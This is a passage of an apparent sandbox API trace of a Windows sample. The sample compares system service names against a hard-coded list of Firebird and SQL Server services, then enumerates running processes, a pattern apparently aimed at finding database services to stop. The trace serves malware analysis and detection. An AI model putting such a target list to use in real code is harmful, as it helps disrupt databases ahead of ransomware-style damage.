lpString2="DoSvc") returned 1 [0171.085] lstrlenW (lpString="DPS") returned 3 [0171.085] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0171.085] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0171.085] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0171.085] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0171.085] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0171.085] lstrlenW (lpString="DusmSvc") returned 7 [0171.085] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0171.085] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0171.085] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0171.085] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0171.085] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0171.085] lstrlenW (lpString="EventLog") returned 8 [0171.085] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0171.085] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0171.085] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0171.085] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0171.086] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0171.086] lstrlenW (lpString="EventSystem") returned 11 [0171.086] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0171.086] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0171.086] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0171.086] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0171.086] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0171.086] lstrlenW (lpString="FontCache") returned 9 [0171.086] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0171.086] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0171.086] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0171.086] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0171.086] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0171.086] lstrlenW (lpString="gpsvc") returned 5 [0171.086] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0171.086] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0171.086] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0171.086] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0171.086] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0171.086] lstrlenW (lpString="iphlpsvc") returned 8 [0171.086] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0171.086] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0171.086] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0171.086] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0171.086] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0171.086] lstrlenW (lpString="KeyIso") returned 6 [0171.086] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0171.086] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0171.086] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0171.086] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0171.086] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0171.086] lstrlenW (lpString="LanmanServer") returned 12 [0171.087] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0171.087] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0171.087] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0171.087] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0171.087] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0171.087] lstrlenW (lpString="LanmanWorkstation") returned 17 [0171.087] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0171.087] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0171.087] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0171.087] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0171.087] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0171.087] lstrlenW (lpString="lfsvc") returned 5 [0171.087] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0171.087] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0171.087] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0171.087] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0171.087] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0171.087] lstrlenW (lpString="lmhosts") returned 7 [0171.087] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0171.087] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0171.087] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0171.087] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0171.087] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0171.087] lstrlenW (lpString="LSM") returned 3 [0171.087] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0171.087] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0171.087] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0171.087] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0171.087] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0171.088] lstrlenW (lpString="MpsSvc") returned 6 [0171.088] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0171.088] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0171.088] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0171.088] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0171.088] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0171.088] lstrlenW (lpString="NcbService") returned 10 [0171.088] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0171.089] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0171.089] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0171.089] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0171.089] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0171.089] lstrlenW (lpString="netprofm") returned 8 [0171.089] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0171.089] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0171.089] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0171.089] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0171.089] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0171.089] lstrlenW (lpString="NlaSvc") returned 6 [0171.089] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0171.089] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0171.089] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0171.089] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0171.089] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0171.089] lstrlenW (lpString="nsi") returned 3 [0171.089] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0171.089] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0171.089] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0171.089] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0171.089] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0171.089] lstrlenW (lpString="PcaSvc") returned 6 [0171.089] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0171.089] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0171.089] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0171.089] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0171.089] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0171.089] lstrlenW (lpString="PlugPlay") returned 8 [0171.089] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0171.089] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0171.089] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0171.089] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0171.090] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0171.090] lstrlenW (lpString="Power") returned 5 [0171.090] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0171.090] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0171.090] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0171.090] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0171.090] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0171.090] lstrlenW (lpString="ProfSvc") returned 7 [0171.090] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0171.090] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0171.090] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0171.090] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0171.090] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0171.090] lstrlenW (lpString="RpcEptMapper") returned 12 [0171.090] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0171.090] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0171.090] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0171.090] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0171.090] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0171.090] lstrlenW (lpString="RpcSs") returned 5 [0171.090] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0171.090] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0171.090] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0171.090] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0171.090] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0171.090] lstrlenW (lpString="SamSs") returned 5 [0171.090] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0171.090] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0171.090] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0171.090] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0171.090] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0171.090] lstrlenW (lpString="Schedule") returned 8 [0171.090] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0171.090] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0171.090] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0171.091] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0171.091] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0171.091] lstrlenW (lpString="SecurityHealthService") returned 21 [0171.091] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0171.091] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0171.091] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0171.091] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0171.091] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0171.091] lstrlenW (lpString="SENS") returned 4 [0171.091] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0171.091] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0171.091] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0171.091] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0171.091] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0171.091] lstrlenW (lpString="ShellHWDetection") returned 16 [0171.091] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0171.091] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0171.091] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0171.091] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0171.091] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0171.091] lstrlenW (lpString="Spooler") returned 7 [0171.091] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0171.091] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0171.091] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0171.091] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0171.091] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0171.091] lstrlenW (lpString="sppsvc") returned 6 [0171.091] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0171.091] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0171.091] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0171.091] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0171.091] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0171.091] lstrlenW (lpString="SSDPSRV") returned 7 [0171.091] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0171.091] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0171.091] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0171.092] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0171.092] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0171.092] lstrlenW (lpString="StateRepository") returned 15 [0171.092] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0171.092] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0171.092] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0171.092] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0171.092] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0171.092] lstrlenW (lpString="SysMain") returned 7 [0171.092] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0171.092] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0171.092] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0171.092] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0171.092] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0171.092] lstrlenW (lpString="SystemEventsBroker") returned 18 [0171.092] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0171.092] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0171.092] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0171.092] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0171.092] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ee5878 | out: hHeap=0x710000) returned 1 [0171.092] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x340 [0171.099] Process32FirstW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.099] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0171.100] lstrlenW (lpString="System") returned 6 [0171.100] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0171.101] lstrlenW (lpString="smss.exe") returned 8 [0171.101] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0171.101] lstrlenW (lpString="csrss.exe") returned 9 [0171.101] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0171.102] lstrlenW (lpString="wininit.exe") returned 11 [0171.102] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0171.131] lstrlenW (lpString="csrss.exe") returned 9 [0171.131] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0171.132] lstrlenW (lpString="winlogon.exe") returned 12 [0171.132] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0171.133] lstrlenW (lpString="services.exe") returned 12 [0171.133] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0171.133] lstrlenW (lpString="lsass.exe") returned 9 [0171.133] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.134] lstrlenW (lpString="svchost.exe") returned 11 [0171.134] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0171.135] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0171.135] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0171.136] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0171.136] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.137] lstrlenW (lpString="svchost.exe") returned 11 [0171.137] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0171.137] lstrlenW (lpString="dwm.exe") returned 7 [0171.137] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.138] lstrlenW (lpString="svchost.exe") returned 11 [0171.138] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.139] lstrlenW (lpString="svchost.exe") returned 11 [0171.139] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.139] lstrlenW (lpString="svchost.exe") returned 11 [0171.139] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.140] lstrlenW (lpString="svchost.exe") returned 11 [0171.140] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.141] lstrlenW (lpString="svchost.exe") returned 11 [0171.141] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.141] lstrlenW (lpString="svchost.exe") returned 11 [0171.141] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.142] lstrlenW (lpString="svchost.exe") returned 11 [0171.142] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.143] lstrlenW (lpString="svchost.exe") returned 11 [0171.143] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.144] lstrlenW (lpString="svchost.exe") returned 11 [0171.144] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.144] lstrlenW (lpString="svchost.exe") returned 11 [0171.145] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0171.145] lstrlenW (lpString="spoolsv.exe") returned 11 [0171.145] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.146] lstrlenW (lpString="svchost.exe") returned 11 [0171.146] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0171.147] lstrlenW (lpString="audiodg.exe") returned 11 [0171.147] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: 